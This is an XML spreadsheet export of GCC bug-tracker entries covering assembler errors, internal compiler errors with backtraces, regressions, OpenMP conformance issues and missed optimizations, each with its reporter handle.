assembly for ibjava/java/lang/reflect/natArray.cc at -m32 on x86_64 darwin
The public Xcode 7 beta and associated Command Line Tools (available on 10.10 from https://developer.apple.com/xcode/downloads/ and https://developer.apple.com/downloads/) replace the legacy GNU assembler with a clang-based assembler. The new clang-based assembler fails to compile libjava/java/lang/reflect/natArray.cc at -m32 in the multilib build of libjava due to the assembler errors...
natArray.s:1110:2: error: ambiguous instructions require an explicit suffix (could be 'filds' or 'fildl')
        fild    8(%esi%edi2)
        ^
natArray.s:1120:2: error: ambiguous instructions require an explicit suffix (could be 'filds' or 'fildl')
        fild    10(%esp)
        ^
natArray.s:1267:2: error: ambiguous instructions require an explicit suffix (could be 'filds' or 'fildl')
        fild    8(%esi%edi2)
        ^
natArray.s:1277:2: error: ambiguous instructions require an explicit suffix (could be 'filds' or 'fildl')
        fild    14(%esp)
        ^
natArray.s:1830:2: error: ambiguous instructions require an explicit suffix (could be 'filds' or 'fildl')
        fild    14(%esp)
        ^
natArray.s:1907:2: error: ambiguous instructions require an explicit suffix (could be 'filds' or 'fildl')
        fild    14(%esp)
        ^
natArray.s:1988:2: error: ambiguous instructions require an explicit suffix (could be 'filds' or 'fildl')
        fild    14(%esp)
        ^
natArray.s:2047:2: error: ambiguous instructions require an explicit suffix (could be 'filds' or 'fildl')
        fild    14(%esp)
        ^
This issue can be reproduced with the attached natArray.s assembly file using the command...
as -arch i386 -force_cpusubtype_ALL -o natArray.o natArray.s
against the new clang-based assembler. The same file is processed without errors using the legacy GNU-based assembler from Xcode 6.2 on 10.9 or Xcode 6.3 on 10.10.
Can the FSF gcc i386 maintainers comment on whether there is anything in the Intel/AMD instruction specifications that merits this strict behavior for the assembler with regard to ambiguous fild instructions?
Note that this compilation failure is limited to -m32 and that the -m64 build of libjava is processed without errors by the new clang-based assembler.</t>
  </si>
  <si>
    <t>GCC-31640</t>
  </si>
  <si>
    <t>cache block alignment is too aggressive on sh-elf</t>
  </si>
  <si>
    <t>The sh4 port aligns blocks that have no fallthrus and that are either frequently executed (JUMP_ALIGN) or preceeded a barrier (LABEL_ALIGN_AFTER_BARRIER) on a cache line.
While in theory this help to avoid cache misses if the block slits over 2 cache lines in practise this reduces cache locality and lenghten distance between blocks.
The number of issued instructions are also impacted. For example the relative indirect address in jump tables needs a byte zero extend instruction if the distance occupies 8 bits instead of 7 bits. 
I ran some experiments and benchmarked (eembc) with 2 strategies
1) -falign-jumps=1
2) Align the block if the size is bigger than a given threshold. (empirically set to 16 bytes half of the cache line size). See illustrating attached patch.
My conclusion is that in -O3 the performance never degrades (option 2 is a little bit better even improving dhrystone by 3%) when removing this padding. And the text size improves by ~15%.
So I was not able to measurate the benefit of the cache line padding although the code size impact is big (even in -O2/-O3 a code size bloat should be motivated by some performance improvement).
Is there a motivating test that justifies this microoptimisation ?
In the illustrating patch I still align the basic blocks on 4-bytes to account for better instruction fetch accesses</t>
  </si>
  <si>
    <t>olegendo</t>
  </si>
  <si>
    <t>chrbr</t>
  </si>
  <si>
    <t>GCC-14684</t>
  </si>
  <si>
    <t>[4.0 Regression] -fprofile-use/-fprofile-generate failure because of coverage mismatch</t>
  </si>
  <si>
    <t>I am unable to profiledbootstrap today's lno (3.5-tree-ssa-lno 20040322 (merged
20040321)):
$ ../gcc/configure --prefix=/usr/local/gcc-lno --enable-languages=c
--with-arch=athlon-xp --disable-checking --disable-werror &amp;&gt; /dev/null
$ make CFLAGS='-O2 -fomit-frame-pointer -fweb' STAGE1_CFLAGS='-O1
-fomit-frame-pointer' BOOT_CFLAGS='-O2 -fomit-frame-pointer' profiledbootstrap
[snip]
stage1/xgcc -Bstage1/ -B/usr/local/gcc-lno/i686-pc-linux-gnu/bin/ -c   -O2
-fomit-frame-pointer -fprofile-use -DIN_GCC   -W -Wall -Wwrite-strings
-Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long
-Wold-style-definition -Wno-variadic-macros     -DHAVE_CONFIG_H -DGENERATOR_FILE
   -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include
-I../../gcc/gcc/../libbanshee/libcompat -I../../gcc/gcc/../libbanshee
-I../../gcc/gcc/../libbanshee/points-to  ../../gcc/gcc/genmodes.c -o genmodes.o
../../gcc/gcc/genmodes.c: In function `calc_wider_mode':
../../gcc/gcc/genmodes.c:746: error: coverage mismatch for function
'calc_wider_mode' while reading counter 'arcs'.
../../gcc/gcc/genmodes.c:746: error: number of counters is 12 instead of 23
make[2]: *** [genmodes.o] ÐžÑˆÐ¸Ð±ÐºÐ° 1
make[2]: Leaving directory `/usr/local/src/gcc/lno/build/gcc'
make[1]: *** [stagefeedback_build] ÐžÑˆÐ¸Ð±ÐºÐ° 2
make[1]: Leaving directory `/usr/local/src/gcc/lno/build/gcc'
make: *** [profiledbootstrap] ÐžÑˆÐ¸Ð±ÐºÐ° 2</t>
  </si>
  <si>
    <t>belyshev</t>
  </si>
  <si>
    <t>GCC-44085</t>
  </si>
  <si>
    <t>OpenMP - untied task accesses threadprivate - non-conforming but no msg</t>
  </si>
  <si>
    <t>Test Case:
!  derived from OpenMP test omp3f/NF03_2_9_2_2a.f90
!  REFERENCES : OpenMP 3.0 p. 83 line 30
program NF03_2_9_2_2a
   implicit none
   integer save :: threadprivate_var
!$omp threadprivate(threadprivate_var)
!$omp parallel
!$omp task untied
   threadprivate_var = 1
!$omp end task
!$omp end parallel
   print * FAIL - Negative test should not compile
end program NF03_2_9_2_2a
&gt; gfortran -fopenmp test.f90
&gt; ./a.out
 FAIL - Negative test should not compile
&gt;
Comments from OpenMP testers:
This test case is derived from OpenMP test omp3f/NF03_2_9_2_2a.f90 .
The negative test checks the following restriction:
The OpenMP API Version 3.0 (May 2008) states the following on p. 83 line 30:
 * A program in which an untied task accesses threadprivate storage
    is non-conforming.</t>
  </si>
  <si>
    <t>longb</t>
  </si>
  <si>
    <t>GCC-70728</t>
  </si>
  <si>
    <t>GCC trunk emits invalid assembly for knl target</t>
  </si>
  <si>
    <t>Created attachment 38308
Reproducer
Reproducer:
&gt; g++ -std=c++11 -Ofast -march=knl -o out small.cpp
&gt; sde â€“knl -- out
Output:
TID 0 SDE-ERROR: Executed instruction not valid for specified chip (KNL): 0x40084b: vpslld xmm8 xmm8 xmm16
Image: /export/users/amitrokh/forCreduce/untracked/knl_vpslld/out+0x84b (in multi-region image region# 0)
Function: _Z3fn1v
Instruction bytes are: 62 31 3d 08 f2 c0
&gt; gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/export/users/amitrokh/gcc_trunk/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /export/users/gnutester/stability/svn/trunk/configure --with-arch=corei7 --with-cpu=corei7 --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld --enable-cloog-backend=isl --with-fpmath=sse --with-pkgversion=Revision=235172/svn-rev:235172/ --prefix=/export/users/gnutester/stability/work/trunk/64/install --enable-languages=cc++fortranjavalto
Thread model: posix
gcc version 7.0.0 20160418 (experimental) (Revision=235172/svn-rev:235172/)</t>
  </si>
  <si>
    <t>kyukhin</t>
  </si>
  <si>
    <t>anton.mitrokhin</t>
  </si>
  <si>
    <t>GCC-78765</t>
  </si>
  <si>
    <t>[7 Regression] ICE on invalid C++ code on x86_64-linux-gnu (internal compiler error: in cp_build_addr_expr_1 at cp/typeck.c:5708)</t>
  </si>
  <si>
    <t>$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1210 (experimental) [trunk revision 243516] (GCC) 
$ 
$ gcc-trunk small.C
small.C:6:42: error: â€˜vâ€™ was not declared in this scope
   static constexpr ValueType doubleval = v
                                          ^
small.C: In function â€˜int main()â€™:
small.C:9:52: internal compiler error: in cp_build_addr_expr_1 at cp/typeck.c:5708
 int main() { ValueTypeInfo }
                                                    ^
0x7eb7d5 cp_build_addr_expr_1
	../../gcc-source-trunk/gcc/cp/typeck.c:5708
0x683162 add_function_candidate
	../../gcc-source-trunk/gcc/cp/call.c:2158
0x6848c7 add_candidates
	../../gcc-source-trunk/gcc/cp/call.c:5491
0x67f9e4 build_user_type_conversion_1
	../../gcc-source-trunk/gcc/cp/call.c:3842
0x680a8a implicit_conversion
	../../gcc-source-trunk/gcc/cp/call.c:1898
0x6890dd build_integral_nontype_arg_conv(tree_node* tree_node* int)
	../../gcc-source-trunk/gcc/cp/call.c:4025
0x70afa5 convert_nontype_argument
	../../gcc-source-trunk/gcc/cp/pt.c:6434
0x711eed convert_template_argument
	../../gcc-source-trunk/gcc/cp/pt.c:7363
0x71fa63 coerce_template_parms
	../../gcc-source-trunk/gcc/cp/pt.c:7823
0x72199a lookup_template_class_1
	../../gcc-source-trunk/gcc/cp/pt.c:8396
0x72199a lookup_template_class(tree_node* tree_node* tree_node* tree_node* int int)
	../../gcc-source-trunk/gcc/cp/pt.c:8738
0x836bed finish_template_type(tree_node* tree_node* int)
	../../gcc-source-trunk/gcc/cp/semantics.c:3146
0x7bea14 cp_parser_template_id
	../../gcc-source-trunk/gcc/cp/parser.c:15464
0x7becba cp_parser_class_name
	../../gcc-source-trunk/gcc/cp/parser.c:21879
0x7af07d cp_parser_qualifying_entity
	../../gcc-source-trunk/gcc/cp/parser.c:6293
0x7af07d cp_parser_nested_name_specifier_opt
	../../gcc-source-trunk/gcc/cp/parser.c:5977
0x7acd20 cp_parser_simple_type_specifier
	../../gcc-source-trunk/gcc/cp/parser.c:16793
0x7aa261 cp_parser_type_specifier
	../../gcc-source-trunk/gcc/cp/parser.c:16464
0x7bf3d3 cp_parser_decl_specifier_seq
	../../gcc-source-trunk/gcc/cp/parser.c:13303
0x7c9770 cp_parser_simple_declaration
	../../gcc-source-trunk/gcc/cp/parser.c:12646
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
$ cat small.C
class ValueType {
  operator int()
  int m_ID
}
class ValueTypeEnum {
  static constexpr ValueType doubleval = v
}
template  class ValueTypeInfo
int main() { ValueTypeInfo }
$</t>
  </si>
  <si>
    <t>chengniansun</t>
  </si>
  <si>
    <t>GCC-66059</t>
  </si>
  <si>
    <t>make_integer_sequence should use a log(N) implementation</t>
  </si>
  <si>
    <t>The following program fails to compile for g++ 4.9.0 and further 
#include 
int main()
{
    constexpr auto N = 1024
    using T = std::make_integer_sequence
    static_assert(T::size() == N )
}
fatal error: template instantiation depth exceeds maximum of 900 (use -ftemplate-depth= to increase the maximum)
Note that Clang with -stdlib=libc++ can compile integer sequences of up to one million for machines with enough memory and around 65K for online compilers such as wandbox.com. Clang + libstdc++ requires -ftemplate-depth=N for N beyond 256. 
Changing g++ default template instantiation depth beyond 900 is not a viable solution. It simply masks the problem of excessive template instantiations. 
Instead the implementation of make_integer_sequence should be made to scale as log(N). See e.g. http://stackoverflow.com/a/17426611/819272</t>
  </si>
  <si>
    <t>rhalbersma</t>
  </si>
  <si>
    <t>GCC-59136</t>
  </si>
  <si>
    <t>[4.9 Regression] llvm-symbolizer shouldn't be started always</t>
  </si>
  <si>
    <t>I've noticed that libasan/liblsan now start external llvm-symbolizer for all programs just in case they would be buggy that looks like a very bad idea to me.  It is quite a big overhead and the usual case for sanitization should be that no problems are reported so IMNSHO if you really need external symbolizer at least start it on the first diagnostic output that should be symbolized.
Furthermore it doesn't have stderr redirected to /dev/null and passes by default options e.g. llvm 3.3 llvm-symbolizer doesn't grok so pretty much for everything it emits ugly error messages.
And when I've tried to LD_PRELOAD=./liblsan.so.0.0.0 ls -l
it because of the starting llvm-symbolizer just in case created a beatiful fork-bomb.</t>
  </si>
  <si>
    <t>GCC-28072</t>
  </si>
  <si>
    <t>[4.2 Regression] target-boehm-gc is being build for targets that do not support it</t>
  </si>
  <si>
    <t>This regression was cause by the patches allowing Boehm-GC to be build with --enable-objc-gc.
The problem is that instead of testing whether java is part of enabled languages (as java is a default langauge and the front end is build independent of the runtime) the new configure test should test whether the java runtime (target-libjava) is being build.
This not only affects sh-elf but any target that fails to build target-boehmgc.</t>
  </si>
  <si>
    <t>ayers</t>
  </si>
  <si>
    <t>GCC-47474</t>
  </si>
  <si>
    <t>Wrong code with allocatable scalar allocatable components as function result</t>
  </si>
  <si>
    <t>Found as part of PR 47455. For the following program
   function find_y() result(res)
     type(tx) allocatable :: res
     ! do something sensible such as allocate(res)
   end function find_y
the dump looks as follows
  find_y ()
  {
    struct tx * res
    res.i.data = 0B  /* &lt;&lt;&lt;&lt; WRONG.  */
    res = 0B
    /* some code.  */
    return res
  }
If one does not use a RESULT variable but find_y as result variable the dump looks as follows:
  find_y ()
  {
     __result_find_y.i.data = 0B  /* Note: 1.  */
     return __result_find_y
  }
Note 1: Unless find_y is used (e.g. allocate(find_y)) the function is generated with an empty body.
For some reason the example program below does not crash here with gfortran 4.5/4.6 but the dump is wrong and I am sure it can cause problems in certain cases. The example of bug 47455 comment 4 does crash - and I believe(d) that it is due to this bug.
program test
    type :: tx
        integer dimension(:) allocatable :: i
    end type tx
    type(tx) :: x
    x = find_y()
    if (allocated(x%i)) call abort()
contains
    function find_y() result(res)
        type(tx) allocatable :: res
        allocate(res)
   end function find_y
end program test</t>
  </si>
  <si>
    <t>GCC-3085</t>
  </si>
  <si>
    <t>Internal compiler error compiling a gtk-- test prog.</t>
  </si>
  <si>
    <t>Got a Internal compiler error 373 compiling a trivial
test program.  (The test program is incorrect but I don't
think that it should trigger a compiler errror).  
Also note that the page 
http://www.gnu.org/software/gcc/bugs.html
suggests the use of gccbug for submitting bug reports
but as far as I can tell this program is not installed
with gcc.
Release:
gcc version 2.95.3 20010315 (release)
Environment:
SunOS 5.7 Generic_106542-12 i86pc i386 i86pc
How-To-Repeat:
g++ -c t_gtk.ii</t>
  </si>
  <si>
    <t>cgw</t>
  </si>
  <si>
    <t>GCC-59915</t>
  </si>
  <si>
    <t>[4.9 Regression] LRA ICE - Repeated looping over subreg reloads (gcc.c-torture/compile/simd-3.c)</t>
  </si>
  <si>
    <t>On AArch64 when gcc.c-torture/compile/simd-3.c is compiled with -O1 it generates an ICE.
 tempf
Analyzing compilation unit
Performing interprocedural optimizations
          Assembling functions:
 tempf
/work/aarch64/src/svn-trunk/gcc/gcc/testsuite/gcc.c-torture/compile/simd-3.c: In function 'tempf':
/work/aarch64/src/svn-trunk/gcc/gcc/testsuite/gcc.c-torture/compile/simd-3.c:22:1: internal compiler error: Maximum number of LRA constraint passes is achieved (30)
 }
 ^
0x896f89 lra_constraints(bool)
        /work/aarch64/src/svn-trunk//gcc/gcc/lra-constraints.c:3933
0x884a5c lra(_IO_FILE*)
        /work/aarch64/src/svn-trunk//gcc/gcc/lra.c:2339
0x848626 do_reload
        /work/aarch64/src/svn-trunk//gcc/gcc/ira.c:5457
0x8492c8 rest_of_handle_reload
        /work/aarch64/src/svn-trunk//gcc/gcc/ira.c:5598
0x8492c8 execute
        /work/aarch64/src/svn-trunk//gcc/gcc/ira.c:5627
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Vladimir has a fix for this that he has posted here http://gcc.gnu.org/ml/gcc/2013-12/msg00086.html. I'm raising this ticket to track this bug and its patch.</t>
  </si>
  <si>
    <t>belagod</t>
  </si>
  <si>
    <t>GCC-50801</t>
  </si>
  <si>
    <t>macro location tracking patch set breaks bootstrap</t>
  </si>
  <si>
    <t>The original report was sent to gcc-patches:
&gt; libcpp/ChangeLog
&gt; 2011-10-15  Tom Tromey  
&gt; 	    Dodji Seketeli  
&gt; 
&gt; 	(cpp_get_token_1): New static function. Split and extended from
&gt; 	cpp_get_token.  Use reached_end_of_context and
&gt; 	consume_next_token_from_context.  Unify its return point.  Move
&gt; 	the location tweaking from cpp_get_token_with_location in here.
&gt; 	(cpp_get_token): Use cpp_get_token_1
Since this set of patches went in I'm seeing weird errors when building
newlib for SPU:
/home/kwerner/dailybuild/spu-tc-2011-10-18/newlib-head/src/newlib/libm/machine/spu/headers/recipd2.h: In function '_recipd2':
/home/kwerner/dailybuild/spu-tc-2011-10-18/newlib-head/src/newlib/libm/machine/spu/headers/recipd2.h:129:3: note: use -flax-vector-conversions to permit conversions between vectors with differing element types or numbers of subparts
/home/kwerner/dailybuild/spu-tc-2011-10-18/newlib-head/src/newlib/libm/machine/spu/headers/recipd2.h:129:13: error: incompatible types when assigning to type '__vector(4) int' from type '__vector(4) unsigned int'
/home/kwerner/dailybuild/spu-tc-2011-10-18/newlib-head/src/newlib/libm/machine/spu/headers/recipd2.h:131:10: error: incompatible types when assigning to type '__vector(4) int' from type '__vector(4) unsigned int'
/home/kwerner/dailybuild/spu-tc-2011-10-18/newlib-head/src/newlib/libm/machine/spu/headers/recipd2.h:132:10: error: incompatible types when assigning to type '__vector(4) int' from type '__vector(4) unsigned int'
The code in question looks like:
  vec_uint4 isinf iszero isdenorm0
[snip]
  isdenorm0 = spu_cmpeq(spu_shuffle((vec_uint4)exp (vec_uint4)exp splat_hi) 0)
  isinf  = spu_cmpeq((vec_uint4)value_abs (vec_uint4)expmask)
  iszero = spu_cmpeq((vec_uint4)value_abs 0)
Note that isinf etc. *are* defined as *unsigned* vector types.
The problem seems to be that the preprocessor somehow stripped
off the unsigned keyword.  A reduced test case is:
#define isinf(__x)
#define vec_uint4 __vector unsigned int
vec_uint4 isinf
(Using the name of a function-like macro as identifer is maybe a bit odd
but should be perfectly legal C as far as I know ...)
Running this through cc1 -E on a SPU target before the patch set yields:
__attribute__((__spu_vector__)) unsigned int isinf
as expected but after the patch set we get:
__attribute__((__spu_vector__)) int isinf
instead.
The problem is clearly related to the platform-specific macro_to_expand
routine that is used on SPU to implement the context-sensitive __vector
keyword.
With your changes to cpp_get_token (which is the sole caller of the
macro_to_expand callback) are there any changes in the interface
to the callback?  Any suggestions what could be going on here?
Note that the implementation of the callback is in
  config/spu/spu-c.c:spu_macro_to_expand</t>
  </si>
  <si>
    <t>GCC-57815</t>
  </si>
  <si>
    <t>[c++11] Error spew on misspelled initializer lists</t>
  </si>
  <si>
    <t>[This is fixed in trunk.  If the stable branch policy means it can't get backported then so be it.  I'm filing the bug because this issue is *really* annoying.]
This erroneous code:
// Adding 'struct misspelled {int a bc[2]}' makes this compile
void func() {
  misspelled object{1 {2 3}}
}
Seems to throw the parser into an awful state.  The 4.7 branch says:
brace_problem.cc: In function â€˜void func()â€™:
brace_problem.cc:4:3: error: â€˜misspelledâ€™ was not declared in this scope
brace_problem.cc:4:14: error: expected â€˜â€™ before â€˜objectâ€™
brace_problem.cc:5:1: error: expected â€˜}â€™ at end of input
This isn't so bad in a program this short but in a bigger program I'm getting multiple pages of errors scattered around the file so finding the actual problem is a needle-in-a-haystack problem.  If the offending code is inside a class definition then a bunch of the bogus errors are *before* the correct one.
Trunk from today gets this right:
brace_problem.cc: In function â€˜void func()â€™:
brace_problem.cc:4:3: error: â€˜misspelledâ€™ was not declared in this scope
   misspelled object{1 {2 3}}
   ^</t>
  </si>
  <si>
    <t>GCC-7437</t>
  </si>
  <si>
    <t>Identical unsigned int calculations differ by 1 depending on number of steps in calculation.</t>
  </si>
  <si>
    <t>a simple calculation of the format
a = b / (c / d)
e = (unsigned int)a
(where a-d are double and e is an unsigned int) is correct.
the calculation
e = (unsigned int)(b / (c/d))
is incorrect.
if the -O or -O2 flag is given at compile time the code executes properly.
I have also tried this on a Pentium II and with gcc3.0.  It does not happen my Sun or SGI systems.
Release:
gcc version 2.95.3 20010315 (SuSE)
Environment:
AMD Athlon(tm) Processor
SuSE linux 8.0
How-To-Repeat:
gcc test.c</t>
  </si>
  <si>
    <t>sewell</t>
  </si>
  <si>
    <t>GCC-12816</t>
  </si>
  <si>
    <t>internal compiler error pari-2.1.5/Olinux-i686</t>
  </si>
  <si>
    <t>gcc -v
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/3.3/specs
Configured with: ../configure --enable-threads=posix --prefix=/usr
--with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man
--libdir=/usr/lib --enable-languages=cc++f77objcjavaada --disable-checking
--enable-libgcj --with-gxx-include-dir=/usr/include/g++ --with-slibdir=/lib
--with-system-zlib --enable-shared --enable-__cxa_atexit i486-suse-linux
Thread model: posix
gcc version 3.3 20030226 (prerelease) (SuSE Linux)
/usr/bin/gcc -c -O3 -DGCC_INLINE -Wall -Wno-implicit -fomit-frame-pointer   -I.
-I../src/headers  -o buch2.o ../src/basemath/buch2.c
../src/basemath/buch2.c: In function `small_norm_for_buchall':
../src/basemath/buch2.c:1516: warning: comparison between signed and unsigned
../src/basemath/buch2.c: In function `relationrank':
../src/basemath/buch2.c:2146: warning: comparison between signed and unsigned
../src/basemath/buch2.c: In function `buchall':
../src/basemath/buch2.c:3036: warning: comparison between signed and unsigned
../src/basemath/buch2.c: At top level:
../src/basemath/buch2.c:1782: internal compiler error: in remove_edge at
callgraph.c:189
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Your form won't let me include buch2.i.gz because it is too large.</t>
  </si>
  <si>
    <t>mriedel</t>
  </si>
  <si>
    <t>GCC-55851</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in size_binop_loc at fold-const.c:1385</t>
  </si>
  <si>
    <t>Created attachment 29074
testcase
Trunk testcase attached.
/tmp/ice.c: In function 'test':
/tmp/ice.c:36:45: internal compiler error: in size_binop_loc at fold-const.c:1385
                     if ((found_bit_mask[dqs][word] &amp; (1 &lt;&lt; j)) == 0)
                                             ^
0x6de9b5 size_binop_loc(unsigned int tree_code tree_node* tree_node*)
        ../../trunk/gcc/fold-const.c:1385
0x74c4ec gimplify_compound_lval
        ../../trunk/gcc/gimplify.c:2239
0x744f5f gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../trunk/gcc/gimplify.c:7146
0x7442b5 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../trunk/gcc/gimplify.c:7459
0x74530b gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../trunk/gcc/gimplify.c:7814
0x74530b gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../trunk/gcc/gimplify.c:7814
0x74530b gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../trunk/gcc/gimplify.c:7814
0x7512bc gimplify_cond_expr
        ../../trunk/gcc/gimplify.c:3285
0x74542d gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../trunk/gcc/gimplify.c:7150
0x74d978 gimplify_stmt(tree_node** gimple_statement_d**)
        ../../trunk/gcc/gimplify.c:5726
0x7449e3 gimplify_statement_list
        ../../trunk/gcc/gimplify.c:1562
0x7449e3 gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../trunk/gcc/gimplify.c:7583
0x74d978 gimplify_stmt(tree_node** gimple_statement_d**)
        ../../trunk/gcc/gimplify.c:5726
0x74e898 gimplify_bind_expr
        ../../trunk/gcc/gimplify.c:1254
0x7455fe gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../trunk/gcc/gimplify.c:7365
0x74d978 gimplify_stmt(tree_node** gimple_statement_d**)
        ../../trunk/gcc/gimplify.c:5726
0x751845 gimplify_cond_expr
        ../../trunk/gcc/gimplify.c:3349
0x74542d gimplify_expr(tree_node** gimple_statement_d** gimple_statement_d** bool (*)(tree_node*) int)
        ../../trunk/gcc/gimplify.c:7150
0x74d978 gimplify_stmt(tree_node** gimple_statement_d**)
        ../../trunk/gcc/gimplify.c:5726
0x7449e3 gimplify_statement_list
        ../../trunk/gcc/gimplify.c:1562</t>
  </si>
  <si>
    <t>jan.smets</t>
  </si>
  <si>
    <t>GCC-61357</t>
  </si>
  <si>
    <t>Patch for 60969 causes MIPS regressions in register allocation</t>
  </si>
  <si>
    <t>This patch (GIT hash c5d7f2f65740ad3659ec083daa6af1df3a6473a7)
2014-05-22  Vladimir Makarov  
        PR rtl-optimization/60969
        * ira-costs.c (record_reg_classes): Process NO_REGS for matching
        constraints.  Set up mem cost for NO_REGS case.
Causes some test suite failures for MIPS including gcc.target/mips/umips-lwp-3.c
Here is a modified version of umips-lwp-3.c:
void foo (int *r4)
{
  int r5 = r4[511]
  int r6 = r4[512]
  r4[2] = r5 * r5
  {
    register int r5asm asm ($5) = r5
    register int r6asm asm ($6) = r6
    asm (#foo : =m (r4[3]) : d (r5asm) d (r6asm))
  }
}
When compiled with: -S -mgp32 -fpeephole2 -mtune=m14k -mmicromips -O2
it used to generate a lwp (load word paired) instruction.  But after
this check in it generates two lw instructions instead.</t>
  </si>
  <si>
    <t>GCC-24780</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] ICE set_mem_attributes_minus_bitpos</t>
  </si>
  <si>
    <t>In a file that defined several templates I received the following error message:
internal compiler error: in set_mem_attributes_minus_bitpos at emit-rtl.c:1539
Bug 20073 involved the same error message but that was marked fixed last February.  The .ii file compiles in 3.4.4 but fails in 4.0.2.  I don't have enough disk space to check out and test newer versions.
The .ii file is at http://mysite.verizon.net/eric.boesch1/TicTacToe.ii.bz2
(Apologies if this report is redundant or less than helpful.)</t>
  </si>
  <si>
    <t>ericboesch</t>
  </si>
  <si>
    <t>GCC-38805</t>
  </si>
  <si>
    <t>sed Unterminated `s' command</t>
  </si>
  <si>
    <t>While configuring in the ./gcc directory I have the following messages :
Links are now set up to build a cross-compiler
 from i386-build_pc-solaris2.11 to i686-nptl-linux-gnu.
updating cache ./config.cache
configure: creating ./config.status
config.status: creating as
sed: file ./confstatGfaGVq/subs-5.sed line 7: unterminated `s' command
config.status: creating collect-ld
sed: file ./confstatGfaGVq/subs-5.sed line 7: unterminated `s' command
config.status: creating nm
sed: file ./confstatGfaGVq/subs-5.sed line 7: unterminated `s' command
config.status: creating Makefile
sed: file ./confstatGfaGVq/subs-5.sed line 7: unterminated `s' command
config.status: creating gccbug
sed: file ./confstatGfaGVq/subs-5.sed line 7: unterminated `s' command
config.status: creating libada-mk
sed: file ./confstatGfaGVq/subs-5.sed line 7: unterminated `s' command
config.status: creating ada/Makefile
sed: file ./confstatGfaGVq/subs-5.sed line 7: unterminated `s' command
config.status: creating auto-host.h
config.status: executing default commands
Then it generates 0 byte Makefiles in the subdirectories. It seems to be related to the ac_max_sed_line variable but I can not find a correct solution to fix it. 
sed version is GNU sed 4.1.5
automake version is GNU automake 1.10.1
autoconf version is GNU autoconf 2.61
libtool version is GNU libtool 2.2.6
On my ubuntu 8.10 box it will build fine with the same options (and same programs versions).
Any hints ?</t>
  </si>
  <si>
    <t>thomas.jourdan</t>
  </si>
  <si>
    <t>GCC-43512</t>
  </si>
  <si>
    <t>[4.5 regression] Many objc test failures</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 157716 gave:
FAIL: objc.dg/encode-1.m (test for excess errors)
FAIL: objc.dg/method-4.m (test for excess errors)
FAIL: objc.dg/sync-1.m (test for excess errors)
FAIL: objc.dg/try-catch-10.m  (test for warnings line 32)
FAIL: objc.dg/try-catch-10.m (test for excess errors)
FAIL: objc.dg/zero-link-1.m (test for excess errors)
FAIL: objc.dg/zero-link-2.m (test for excess errors)
ERROR: objc.dg/method-4.m: error executing dg-final: couldn't open method-4.s: no such file or directory
ERROR: objc.dg/zero-link-1.m: error executing dg-final: couldn't open zero-link-1.s: no such file or directory
ERROR: objc.dg/zero-link-2.m: error executing dg-final: couldn't open zero-link-2.s: no such file or directory
Revision 157712 is OK. Those checkins:
http://gcc.gnu.org/ml/gcc-cvs/2010-03/msg00552.html
http://gcc.gnu.org/ml/gcc-cvs/2010-03/msg00553.html
may be the causes.</t>
  </si>
  <si>
    <t>GCC-79201</t>
  </si>
  <si>
    <t>missed optimization: sinking doesn't handle calls swap PRE and sinking</t>
  </si>
  <si>
    <t>Consider this code:
int f(int n) {
  int ij=0
  for (i = 0 i &lt; 32 i++) {
    j = __builtin_ffs(i)
  }
  return j
}
With gcc -O3 you get
f:
        xor     eax eax
        xor     edx edx
        mov     ecx -1
        jmp     .L3
.L5:
        bsf     eax edx
        cmove   eax ecx
        add     eax 1
.L3:
        add     edx 1
        cmp     edx 32
        jne     .L5
        rep ret
However with clang you get
f:                                      # @f
        mov     eax 1
        ret
A similar difference occurs if you replace the limit 32 with the variable n.
gcc is unable to detect that the loop can be omitted.</t>
  </si>
  <si>
    <t>drraph</t>
  </si>
  <si>
    <t>GCC-67448</t>
  </si>
  <si>
    <t>inline-asm</t>
  </si>
  <si>
    <t>compiler crash#inline assembly#rvalue operand with constraint m</t>
  </si>
  <si>
    <t>$ cat t1.c
void f(int i)
{
    __asm( : : m(i += 1))
}
$gcc t1.c -S
t1.c: In function 'f':
t1.c:3:24: internal compiler error: in expand_gimple_stmt_1 at cfgexpand.c:3391
     __asm( : : m(i += 1))
                        ^
0x82b4249 expand_gimple_stmt_1
        ../../gcc-5.1.0.src/gcc/cfgexpand.c:3390
0x82b4249 expand_gimple_stmt
        ../../gcc-5.1.0.src/gcc/cfgexpand.c:3497
0x82b7746 expand_gimple_basic_block
        ../../gcc-5.1.0.src/gcc/cfgexpand.c:5509
0x82b9356 execute
        ../../gcc-5.1.0.src/gcc/cfgexpand.c:6127
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The operand is an rvalue and should be restricted from using within this context like 'i++' is. Strangely enough 'i = 0' is allowed despite of the fact that it is also an rvalue.</t>
  </si>
  <si>
    <t>barannikov88</t>
  </si>
  <si>
    <t>GCC-5665</t>
  </si>
  <si>
    <t>ICE in cp/decl.c</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
